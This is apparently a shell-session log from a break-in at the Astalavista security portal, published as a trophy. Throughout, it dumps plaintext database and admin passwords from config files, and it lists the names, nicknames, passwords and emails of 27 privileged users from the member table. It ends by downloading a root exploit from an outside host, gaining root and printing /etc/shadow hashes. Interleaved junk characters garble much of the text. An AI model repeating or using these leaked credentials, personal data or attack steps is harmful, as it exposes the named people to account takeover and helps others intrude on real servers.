3 t5 |# e9 G4 z' ~8 Z3 ddrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql2 Y2 A9 G5 ^6 t: m: Z9 {" Z3 f
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
7 P1 S: M8 r1 ^0 S5 w) X# L" @drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend" h5 U* _( L6 b5 K+ e
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
( r% W. W" `* K K- D+ O-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg0 Q5 P4 i) a* o, R1 _
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config) y! D( W0 e: X2 R* F% \
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
) A, _1 W: ~. A6 E r* f. T6 u* `drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd. O4 r9 J9 ^1 t, B( _$ a3 Q) H
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php0 S& E2 V3 ~. e+ `7 q; \. K& H, s$ }
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico+ P& L1 x6 N7 t# f+ ]( k7 s
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
9 z* e; h- {' l4 X: o9 I1 Pdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour9 b* o; i3 ?, e
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
9 A" Q3 Y0 g4 q" x4 ^ U-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess% R) {7 U5 L( c, J
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
3 L/ ?, c" M/ z. j% @ I-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
( t5 t7 B' T2 m: ^-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php; o, B1 J! Y' G% y
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
/ r X+ B* a0 t. }$ I-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
, ?. \2 y4 r: E) `" Q& Wdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
" R, e6 I" f" ?6 q% Edrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang. U2 s, C) R0 S5 p8 x6 a; A
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
9 I& u. d$ z/ Ddrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
; ~/ n7 A) r( {3 adrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
9 G7 N% ]& Q; E ~. _ m3 P+ Hdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
5 c- V* B2 P3 @5 Y- c' y4 ^, Jdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
' ~2 _! V/ V3 z5 X, x- s-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf0 A H% B8 s3 R2 G, A. ?* [8 p1 i: n2 J
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
, c& U# `0 O6 V4 i3 P-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
- V% N5 d: T5 pdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss' k7 F6 E+ _" z% v( U4 f
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources/ u: q, r" c, M# X8 `9 o0 T1 ^
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
* J4 {$ B. O$ P) h* R1 C. Wdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
. J( l4 v7 Y9 X8 h& ~3 ]/ t8 Ydrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
5 }8 h& F$ d8 b# W7 h+ |5 A8 vdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
9 |/ _+ X" r( _8 r9 O- s/ V( o" zdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v24 M. q3 N/ a h
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
! E: O/ z+ d4 b: c, N-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
# Q1 c3 y: D- b' R$ q9 Kdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
. d& B5 S( _) Y7 a# k: ~
3 o+ s: b R% o) E# tsh-3.2$ head -20 index.php
1 ]- {; m$ x* B8 X<?PHP/ E) H8 O: I3 z" I4 Z4 m
/**
+ |+ m. Y# [" ?1 U4 ]% F) e% B* Mainfile (external) for astalavistaNET v2.0. g# x7 {$ W6 Y+ H" m3 s
*
8 [$ ]7 b& L0 ]4 Z* @copyright Astalavista IT Engineering GmbH
; S0 u8 S3 `+ T& k, s* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
/ r2 Q! U6 `2 u# w/ a2 e, w* @version 1.0' `4 t3 m+ h) R$ R
*/
% n3 s9 w; u+ A- Z- w
" E' @7 p& R' t1 N& B if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {. O; P+ f! ~/ Y& D/ y u) Z* X9 \
$dontStartSession = false;! u6 Q+ z- u0 J* }; Q0 C
} else {
, ~6 v3 g7 e C9 `- c* Z $dontStartSession = true;
; U5 [2 G) T! s }
5 w5 a4 I1 E5 o' Q/ C6 @2 ? require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
1 x) a! k9 K b5 Z2 T0 G& c require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
5 K: V' ?5 n8 Q; V9 b: X require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);4 l( e) [1 f3 E2 b# X* v
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);& ^/ m+ Y" B+ e& G: Q+ V, W9 L
1 w' q: E( Y& L. K6 nsh-3.2$ cd config0 o2 c0 p0 u' F! J h4 t, T, c/ j
sh-3.2$ ls -la( q' m* i& t% \% y9 }
total 32. @; x: Q5 ?0 K0 x: ]
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
( m+ Y9 K: R H. M# x) q7 Ydrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
. j, J- _+ @ a4 ]/ O# G-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
6 L* T. ]1 _" N8 ~% { g-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php1 p: K3 ^( o& k7 A6 \' d8 t
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
) ~) d6 T* E3 H-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php8 V. l" X3 C3 C/ T! n
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php' M9 X* B( [. E3 Q$ K% e
2 o* A |& g% [$ Q, Ysh-3.2$ cat com.conf.php: N/ ?0 P7 c+ Q& e/ {+ q& V
[snip]8 [0 w, i# V4 h7 ^0 [ Q* a
//member-database7 P1 z% a k( c$ P) S& l
$_CONFIG['db_mem_server'] = ‘localhost’;
8 V! D: f/ w" U, |# l9 Q. p9 W$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;7 [8 i: O- r2 E5 I8 ~ T
$_CONFIG['db_mem_user'] = ‘astanet_db’;
5 b3 e! r; v; ?/ m( U# q/ U$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’; s* O) Y. M6 F+ y, t
$_CONFIG['db_mem_debug'] = false; //true or false* N" U; z! y' u: C# Y# I
//ads-database
( C$ z/ o2 q: u8 n$_CONFIG['db_ads_server'] = ‘localhost’;. u0 ^; c3 Q5 f$ Y4 B; n
$_CONFIG['db_ads_database'] = ‘astanet_ads’;7 O( \0 i7 e0 {# n6 z3 u2 n
$_CONFIG['db_ads_user'] = ‘astanet_db’;
* o! ?% T) n& o0 X$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
, L1 m* z A- P' C3 N. D! `$_CONFIG['db_ads_debug'] = false; //true or false
+ S! w2 Q# _) E8 E) Y//rainbow-database6 c* G- f i2 H F
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;0 I% x* n9 I" L" y; T& W+ s: V& }
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
- N2 s9 k4 c% l2 y$_CONFIG['db_rainbow_user'] = ‘dinu’;4 Q) K1 g) u* G3 d( P
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
M! j0 V1 [1 p) _9 M$_CONFIG['db_rainbow_debug'] = false; //true or false
3 d. G6 p# b2 }+ }: B//mailing lists database* N- j& q5 |, m. z/ T
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;! y) F% M( W: \* x! E2 E9 p: W
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;/ A6 _# O% m% g' D. E# f
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
, K0 y4 z3 E7 Q5 a1 ?$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
4 M! i& R0 d+ H$ r$_CONFIG['db_mailing_lists_debug'] = false; //true or false7 N: i/ u- Z, ]6 L2 g0 n& y1 s1 `
//paypal! ~% T$ w( C* F R2 |
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
& d* P, ^5 D/ o6 I1 a$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
/ v% d& f, P/ g' o1 b) x% o$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;* Q9 P' ^4 b/ C& Z, i% B9 i
$_CONFIG['sub_pp_noship'] = ‘1′;- g6 D1 w9 L% s! g- o6 _. w
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
) b/ x( s; i2 n1 K[snip]$ O2 l3 X- [2 ^5 {: d9 K# ?
3 `- z/ F( ]1 Vsh-3.2$ cd ..( U$ f$ {* k6 G% m
sh-3.2$ cd member% C* C; u Y9 \1 c/ ?8 U
sh-3.2$ ls -la5 }5 r6 t/ b$ v/ R4 v( i
total 20) F# F5 o* V. _2 L: q; e# o5 J
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .. a+ y: C! x3 C6 F# U
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., a4 O z6 E: n5 F3 _: a, t
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
% p6 V8 D, X& @/ Q: F-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
; Y: ?# k5 a3 }: l3 tsh-3.2$ cat .htaccess
0 x a% `; I3 B& g* {& { Q& g+ lSecFilterEngine off/ z9 }; {4 i' `6 u- L
7 j, R% g; R6 K' s+ bsh-3.2$ cd ..# {) l: @$ q# C0 r9 t
sh-3.2$ cd cron
3 \" @! Z5 P! d( \& ?% Qsh-3.2$ ls -la
5 B5 s* l2 g! ~+ Z& Q0 {- \5 ~total 168, ]! [8 e3 M' _; N/ u4 y9 f; W6 F4 W
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
# q0 }/ A( a' f* r7 Xdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
" a# t+ Y. e% {# ~+ C: X/ ?8 r-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php! A9 {" N# f3 d8 E+ G: E# _
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
2 R! q' d/ r+ ]7 q5 f-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
/ t. a4 v; H/ a2 m' i7 g) Q-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php% T* ?! E0 Y4 W# B- D4 v: z0 Q
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php) h, w% C% {& d/ w
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php+ {& V4 m M1 p
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
$ o0 V; }9 }0 E4 b* J-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php( j* F$ {. _- u
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh+ n- v! M% U. d" y$ i# n
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
q' S# g% d! c-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
: y N5 @2 T- b: s! b7 a8 p7 g-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php- \. V7 \; J. Z$ a- s
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
O! o! t7 p: U0 a-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php# |5 v i: C( V' ]" `1 x
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
5 B0 j! H( q. m* E# K, g6 n-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
/ C3 Q9 }( u1 B-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
6 u. r5 g3 c" I! k+ ?9 p-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
9 p/ ?' e v5 udrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
" G4 P+ ]( M- }, T+ F( O7 W. _0 }& l-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php: {7 U% w) K6 a* ?+ D( K+ V+ r4 C
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
- {: T' k, F7 p' j" N7 o( F8 B* y+ v( Q- R9 r: `
sh-3.2$ cd ..& ^2 V1 L! C# z+ a! v6 Y( B/ h- S
sh-3.2$ cd _007& E+ m+ V5 o% \: {. A. \# R2 A1 b
sh-3.2$ ls -la
: j8 @! p d& O, U/ w8 Htotal 24 g0 r# i9 y" A
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
0 d5 _8 j1 ~0 O; \6 D$ N# Wdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
; O# v2 T. B2 I' a( ]- a* a. m0 v. N-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess6 d* f3 f; ?% Q7 v+ {& P4 V3 U
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
" v# ^0 ~2 n0 J5 @* ?& ?2 A& E; V7 g-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php, R8 `. x2 y' ?. Q) J
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
7 L8 M d+ u# Q1 f5 B% _9 S7 v! ^1 n6 c( f: Q5 z% r d
sh-3.2$ cat .htaccess S. I" f9 ^7 {5 R, N$ G
authType Basic9 m# M0 j$ @8 S, o4 ~
authName Admin" B! ]; V0 X6 D" @
authUserFile /home/astanet/auth/.htadm_pwd3 S; k3 \7 S1 Q, G$ h5 F/ Z, X9 j
require valid-user6 `6 ]: ]: r, R0 b' i6 e
. h; A# q" O- F
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
- R5 d: U' N) \* W, A* k. P; @admin2net:CR0bl65MwhfT
' Y& K* x8 O3 Y' L8 X$ T1 V; x5 k9 z
" \" @: N) E4 t" e% a, F* ?4 S7 l) osh-3.2$ mysql -u astanet_db -p& {. T, F( c& n/ m( d
Enter password:1 X8 D) L5 W: n8 o
Welcome to the MySQL monitor. Commands end with ; or \g.5 `+ ?7 {+ k% \, N! J" A0 f
Your MySQL connection id is 275153
3 G' K- C6 ~- e' TServer version: 5.0.45-community-log MySQL Community Edition (GPL)4 _% T, d, s4 D% f$ B* y
i1 V8 ~8 y- F9 }
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 ^/ Y4 S R5 b7 p
& @& F9 p" X, ?0 F) S! \
mysql> show databases;8 L: I' ~$ P6 W' {# {: F9 Q
+———————–+. [! R3 l* `) s! D5 N. W
| Database |
5 o# G# Y1 U# k6 L o% B+———————–+* q( o5 s$ k+ M. H5 W' W N
| information_schema |- J H7 K" b0 b- k% n
| astanet_ads |
0 Z- H+ e0 |# U" w. g2 }" x| astanet_mailing_lists |
# [& h& a* [1 z+ o; q5 U| astanet_mediawiki |7 Z) T+ O0 `# N+ w1 x
| astanet_membersystem |
0 J" n# u7 N" o, i9 }( W9 r7 {| test |( M+ m" f, ?' f
+———————–+/ ?- X4 u6 D$ v& `: t4 I/ l
6 rows in set (0.00 sec). _( I$ w! L1 u A$ |/ [3 E4 H$ A
9 u2 Z* F0 w8 _3 d0 t
mysql> use astanet_membersystem
3 }0 a) ^* Z* r. z3 L$ f; SDatabase changed$ s, i, |- y, h5 ]" }& [, C! m& G
mysql> show tables;6 v$ C1 c3 M# b/ |: w- g( p3 p1 t
+———————————–+ h3 e/ O( i4 [, K/ `6 i- j* V
| Tables_in_astanet_membersystem |1 U/ a$ R! j! ]& A/ z" m
+———————————–+- X8 S( [" ~* {4 U+ i0 _: e
| blacklist_categories |
# t0 @- X; ]! J1 L| blacklist_content |
- \* s* q9 C7 R# V0 Y| blacklist_levels |* E3 _ i# f# ]* u( n X6 E% E
| blacklist_mcset |) r, z, { h1 F0 @2 X
| dir_categories |
5 [3 D4 e6 h* m- v$ C3 x| dir_comments |
0 S8 N! m& o( y0 Z3 L| dir_links |( {3 J. p# M, z$ J
| dir_temp |( Y# K) t7 ~! u* \' M
| dir_votes |
& a- d9 n- z& e N| documents |# N5 T: K& }$ B
| documents_categories |' b1 e) @6 s4 v! u2 c
| email_content |4 d( {# \" q) x! |3 f/ ~
| email_settings |
, M( O" C; ?$ ~" N| exploits |1 Y7 f3 d9 M( V9 N) F8 Z7 t
| exploits_categories |
1 a# ]. l, W0 j. p6 c& x. Z. c| exploittree_categories |
& N& }7 J. f% d: c# D6 N x* X| exploittree_exploits |
0 p7 S! L! [$ Z2 ?. ^' M- u/ K| home_values |
) i G# J$ K) a& w, f& v| iso_countries |; P1 E( v1 c8 e" {
| links_categories |' M+ E+ O r: ?
| links_records | H9 {3 r( }8 C5 z! I
| links_unauth |
. m% e4 ?) ~: C4 k) ^3 d| links_votes |% ]- H& I. s; o$ @* s P
| log |5 w" {$ o# `; D! T% M# J3 C( b
| news_categories |
* F# d$ r1 ^% E" P' v| news_comments |
! C: l% g! t. c1 \9 }( _- _& z| news_emoticons |) v0 |- e4 M' V, o# w3 W
| news_latest |
, V) W1 s2 N+ o7 k| news_messages |; ^# Y, o8 B5 S% t2 {5 A
| news_statistics |# ]) n: e* q; w! h
| news_votes |
9 ? y' ]; S* j Y# K U$ ^| prices_content | O% z- {* e) l8 \4 c2 i
| prices_offers |- E2 \& p" d3 b3 T+ `
| rss_settings |
- ~4 [5 y7 ^ A$ L6 q7 S. g| sessions |+ S8 ? ]6 F4 w& {0 @
| stats_signups |+ |& V( p" s I( \: |' V3 D( D. u
| u2u2 |- B. u$ ]" V' C) J
| u2u_contact |
9 c) p/ }* R A T S% J| u2u_settings |
1 _6 j! j$ j0 S) g6 i# I) e5 R0 s8 v| user_keywords_selected_categories |
3 a5 E- Y Y! O1 C3 C| users |! O" I$ @! i) U8 i
| users_ipn_test |
" W. b/ ?. d. v) j7 |2 b' D. X8 Q* M| users_keyword_values |
( |: C& w3 T, l. O5 L| users_profile |! Z* m" o1 Y7 T* q' W' K4 U
| users_temp |3 S( m; e) h# Z: C
| users_upgrade |
/ J: l! B8 b% \% g: }+———————————–+
3 G& y; u4 y8 T) s- l- w I46 rows in set (0.00 sec)1 U7 n6 n; F+ B
. l' M" K, a) t* y* emysql> describe users;
" b' X3 k7 W0 Y9 J7 i+————————–+————————————–+——+—–+———————+—————-+" G0 T. Z. A2 h
| Field | Type | Null | Key | Default | Extra |5 s; G/ a5 j- h Y D
+————————–+————————————–+——+—–+———————+—————-+$ Y' |# ?2 I+ q* k) i$ z5 ]4 j% n
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |* m; P- v' _2 E. f. s6 B- c! m
| user | varchar(50) | NO | | | |
& D8 G6 k$ S1 Q7 d| nickname | varchar(30) | NO | MUL | anonymous | |9 H, @: J7 N$ ^4 K
| password | varchar(30) | NO | | | |) V. `4 t- [$ \
| userlevel | tinyint(3) | YES | MUL | NULL | |) a7 A2 X- K/ |# k' T, o: J0 b* o
| exp | int(8) unsigned | NO | | 0 | | y' j% k' a1 Y: _4 v. N
| email | varchar(50) | NO | | | |3 q: H5 j6 d3 q/ P; ^
| ip | varchar(15) | NO | | 0 | |( f2 ] _: j$ {4 ?
| proxy | set(’0′,’1′) | NO | | 0 | |( r9 x* x: C! ?" t( Z
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |: }9 k% }5 ?9 f- P8 j8 a8 V
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
- c& Q5 u8 d0 ^. M. G5 V| anz_in | tinyint(1) | NO | | -1 | | q6 u+ Y, I% a; b% p- n
| status | tinyint(1) unsigned | NO | | 0 | |) W/ c' a! j9 z/ E
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
5 e$ h1 J# _$ V" b5 v| freemember | set(’0′,’1′) | NO | | 0 | |% X( X9 C/ a7 _/ G# x. n' L/ D
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
6 {) `. [" A& v. o1 f| lang | tinytext | NO | | | |
& a' k, X9 G5 z, k# D| adid | smallint(6) | NO | | 0 | |
7 Y9 l; a1 {7 V; t# e! || pp_txn_id | varchar(255) | YES | | NULL | |
$ @4 h0 }0 o" S| cnb_transaction_id | varchar(255) | YES | | NULL | |8 L/ a9 w0 Z- M7 {
| cnb_order_id | varchar(255) | YES | | NULL | |8 z; H, S7 O5 F2 j* B+ W
| cnb_user_id | int(11) | YES | | 0 | |
' s8 f$ X+ i/ v$ A7 P8 q0 E: p+————————–+————————————–+——+—–+———————+—————-+
, ]( r9 E0 g% u22 rows in set (0.01 sec)
! O, x5 Y# _) r' v; q
1 \$ O1 a3 o7 `* U# p) ]% `mysql> select count(*) as skids from users;( u4 W1 C3 B( g. [* `5 N7 R
+——-+
0 G# }. y7 c4 e% b# I) \" {& R" k| skids |
0 r2 T9 {3 b4 B+——-+
7 P% _" J t& D7 t| 25199 |
# ^: M1 K5 l- B9 P) w* V7 N+——-+
; G/ q0 ?) h6 y# v" n( v2 ^3 I$ q4 q1 row in set (0.00 sec)6 q( x' m: V- w8 ?7 |! o/ B
3 y2 K- p( j* c( W+ q
mysql> select user,nickname,password,email from users where userlevel = 1;4 i9 I, F* M- [+ _) p
+————————–+———————-+——————+———————————–+
& Z# ?5 q, [8 h+ D| user | nickname | password | email |
# \, `' V5 Y# p( h$ ^+————————–+———————-+——————+———————————–+- m8 d! k+ k+ p* e" N2 E( [& _
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |& A7 ~4 N8 I- g2 v/ Q
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |& c' d3 f2 s( z6 d/ S8 x. Y% y
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
- T: K. t2 C) o( g. Y! F0 ]% ^" Z| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |$ P4 Y7 S, \/ D$ [
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |8 o6 k& u* D" p: i9 F- }1 e, ~. c: J
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
& l0 r' V) Q7 [6 O& ~5 O+ N| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
8 N$ o4 H1 g( R# G& D| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
: M' e3 A: `- r! D) j6 R| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
* [1 A! R; y# U; _- x5 D| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |6 e8 O9 J Q% b# Z5 ?
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
1 l& j* L( |1 ?$ K2 c| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
8 _6 D( r+ O$ l2 ]3 `| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |4 g! t# E# _0 V9 J+ W g* W) |
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
% r% B8 O. j0 g$ t# U| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
. {5 G: L* K% K+ ?8 S" Z| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |0 ?8 ~1 h- z4 A3 S
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |* ]& m+ \4 S0 y% y, M
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
, B! m( e! s* e& Z3 s) {| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
$ g z" _2 x2 _| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
& r: b- {$ @; l9 v- n8 c| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
0 I* R% o: u# B/ C| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
. g# k2 S9 L5 u. D| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |& M$ |) U& S8 [) ~+ X
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
3 V! l4 m2 Q, g9 O# f/ l: B| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
6 U* f ?$ Y M1 a; }| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |; K9 P0 m' c( ^" E
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
& y: y% N* k( F: b* }+————————–+———————-+——————+———————————–+2 T7 L% {. ^; h# R1 v8 e
27 rows in set (0.00 sec)
& y/ k' r+ d# m7 m$ A
) `8 @* I. S7 r! L/ Tmysql> exit;
# h: a* r. o J4 v- [0 T" w- ZBye8 j% g, a. C9 h: A8 Z- t8 r
* p5 T* B, R, a3 N! {" O8 S[~] plaintext passwords? yes,+ f4 | C. x4 j4 Z. Y: n
Those so called “security professionals” who charge you $6.66 / month to% f1 a% X8 G [9 \
register at their hack-proof portal, save your passwords in plaintext…3 g' ]6 h ]& m
brilliant!0 Y( K" {0 ` h
5 e& z; i1 N6 F4 h7 Z6 y3 S1 T
[~] This been fun but we want more.
' v$ _% T$ J6 Y( F9 z/ n2 C
$ s' t# x, X9 }+ Vsh-3.2$ uname -a
, ?- `# i' F( ]& rLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
' R% @$ S8 |! x0 X$ s: P( z! Lsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
# U/ t8 R5 U/ C! s6 }: X–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
1 n, }# S- c) w' b: Q( e4 pResolving anti.sec.labs… 13.33.33.37
/ v+ {0 d+ c( v4 CConnecting to anti.sec.labs|13.33.33.37|:80… connected.
$ g0 D0 L7 [) H0 P0 q6 k1 CHTTP request sent, awaiting response… 200 OK
! [3 ?" X; h1 a. j8 K oLength: 18200 (18K) [text/plain]
3 d/ V l; h/ M8 SSaving to: `g0troot’
\* L; f( v! k4 G8 N6 t; a
6 G9 f. ?* N) `, r- k* i8 a100%[=========================================================================================================================================>] 18,200 58.6K/s in& G1 ~& h! y0 t
0.3s1 j2 I9 t$ t* u
: h1 H% S! y8 p% j% z( L
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
* f% j' I( b0 n; p& P' k$ ]% ~) F7 X0 t
1 @+ m8 e8 r. O6 e! T7 d+ w* fsh-3.2$ ./g0troot -i x86_64& y! O/ ^' ^2 Z% @1 @! }0 l
[+] g0troot - anti.sec.labs6 L8 @- i% h% s0 k1 D
[+] Target: 2.6.18-128.1.10.el5' x( b8 b1 k- [ A$ i7 V
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
4 e* U) h1 a9 l+ V
! u# J1 _7 U' ~0 {, z1 J[+] r00tr00t, w" } g/ y/ s
[~] Executing shell…
4 ^4 w8 T. n K9 _+ {2 N, R2 l
sh-3.2# id
6 M' E ?. j' z6 L& Ruid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
7 P, S9 J" w4 B# c) W7 R/ h7 F+ B+ j3 I: v: v3 l
sh-3.2# cat /etc/shadow0 N6 {9 Q/ N- j$ D0 T( e
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
) b8 v5 c1 O$ Q- x' ^[snip]1 C. D; C# x% a8 i8 x& r$ ]
admin 1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
" x- Z- p8 M2 D; F3 R) I8 [5 ~1 vjon 1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::* h* t# n7 w$ P4 `; P7 l4 }
com 1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
